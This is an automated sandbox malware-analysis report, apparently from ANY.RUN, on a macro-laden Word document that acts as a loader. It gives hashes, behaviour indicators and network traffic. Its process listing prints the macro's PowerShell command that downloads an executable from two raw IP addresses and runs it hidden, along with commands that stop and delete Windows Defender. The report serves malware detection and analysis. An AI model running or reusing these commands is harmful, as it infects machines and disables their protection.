analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

order_872007.doc

Full analysis: https://app.any.run/tasks/cc70ab1b-41d3-480d-8f93-780d8a0f4d8a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 15, 2018, 19:15:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Enpor Support, Template: Normal, Last Saved By: work, Revision Number: 13, Name of Creating Application: Microsoft Office Word, Total Editing Time: 11:00, Create Time/Date: Thu Nov 15 13:24:00 2018, Last Saved Time/Date: Thu Nov 15 14:12:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

946168961A2B7386F3D52896C4001C48

SHA1:

EE271C5138FC8B36098E50DC9993A3B9717E6BC1

SHA256:

4367F54AC061E23646998032E1ABFAD6931443FA3C0D3061403671569D6D9DF9

SSDEEP:

3072:h57WssAb0KJ7vnVMIZRfw8z8N5Ygaw/ZX/PcSJqDmO6KQcsvg:h1zsw7yIZJEYgaw/ZXM0kmtKQcsI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3608)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3608)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3288)
      • cmd.exe (PID: 2256)
    • Application was dropped or rewritten from another process

      • tmp808.exe (PID: 2960)
      • tmp909.exe (PID: 2424)
    • Downloads executable files from IP

      • powershell.exe (PID: 1480)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1480)
    • Known privilege escalation attack

      • DllHost.exe (PID: 2100)
    • Stops/Deletes Windows Defender service

      • cmd.exe (PID: 1600)
      • cmd.exe (PID: 1012)
      • cmd.exe (PID: 3860)
      • cmd.exe (PID: 3400)
    • Loads the Task Scheduler COM API

      • tmp909.exe (PID: 2424)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3784)
      • powershell.exe (PID: 1480)
      • tmp808.exe (PID: 2960)
      • powershell.exe (PID: 2420)
      • powershell.exe (PID: 3792)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3784)
      • tmp808.exe (PID: 2960)
      • tmp909.exe (PID: 2424)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1480)
      • tmp808.exe (PID: 2960)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3132)
      • cmd.exe (PID: 2184)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3608)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3608)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Enpor Support
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: work
RevisionNumber: 13
Software: Microsoft Office Word
TotalEditTime: 11.0 minutes
CreateDate: 2018:11:15 13:24:00
ModifyDate: 2018:11:15 14:12:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Название
  • 1
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
20
Malicious processes
8
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe tmp808.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs CMSTPLUA no specs tmp909.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3608"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\order_872007.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3288cmd /c powershell "'powershell ""<#wait done#>function dodone([string] $sname){(new-object system.net.webclient).downloadfile($sname,''%tmp%\tmp808.exe'');<#last info#>start-process ''%tmp%\tmp808.exe'';}try{dodone(''http://46.173.219.50/hala.van'')}catch{dodone(''http://46.173.219.51/hala.van'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp347.bat; start-process '%tmp%\tmp347.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3784powershell "'powershell ""<#wait done#>function dodone([string] $sname){(new-object system.net.webclient).downloadfile($sname,''C:\Users\admin\AppData\Local\Temp\tmp808.exe'');<#last info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp808.exe'';}try{dodone(''http://46.173.219.50/hala.van'')}catch{dodone(''http://46.173.219.51/hala.van'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp347.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp347.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2256cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp347.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1480powershell "<#wait done#>function dodone([string] $sname){(new-object system.net.webclient).downloadfile($sname,'C:\Users\admin\AppData\Local\Temp\tmp808.exe');<#last info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp808.exe';}try{dodone('http://46.173.219.50/hala.van')}catch{dodone('http://46.173.219.51/hala.van')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2960"C:\Users\admin\AppData\Local\Temp\tmp808.exe" C:\Users\admin\AppData\Local\Temp\tmp808.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Toolset
Exit code:
0
1012/c sc stop WinDefendC:\Windows\system32\cmd.exetmp808.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1600/c sc delete WinDefendC:\Windows\system32\cmd.exetmp808.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3132/c powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\system32\cmd.exetmp808.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2860sc stop WinDefendC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
A tool to aid in developing services for WindowsNT
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 982
Read events
2 403
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
12
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
3608WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA94B.tmp.cvr
MD5:
SHA256:
3784powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QIM5ADYFSLCM7QHXHJ4C.temp
MD5:
SHA256:
1480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YCVPYE7PT45R587CN5GE.temp
MD5:
SHA256:
2420powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ESNK8B2E7PPHXSEO9WL2.temp
MD5:
SHA256:
3792powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JNZ4WXO19VXZC0KNBLSI.temp
MD5:
SHA256:
3784powershell.exeC:\Users\admin\AppData\Local\Temp\tmp347.battext
MD5:D05C35C6E74A472A0202D50424CFE715
SHA256:6EFC4417582D1391BEE71BCED0CF815DE201BA9339598EDE89A9ECA717CCA522
3608WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:11DED0D8BBA3F810DECC0D504DB0ADD3
SHA256:595A99C1AE5BFC290647BC293DFFB43CCAD089D6FEA96D3D5C03EDA729FE8DE3
3784powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db419.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2420powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5de848.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db8ad.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1480
powershell.exe
GET
200
46.173.219.50:80
http://46.173.219.50/hala.van
RU
executable
307 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1480
powershell.exe
46.173.219.50:80
Garant-Park-Internet Ltd
RU
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
1480
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1480
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1480
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info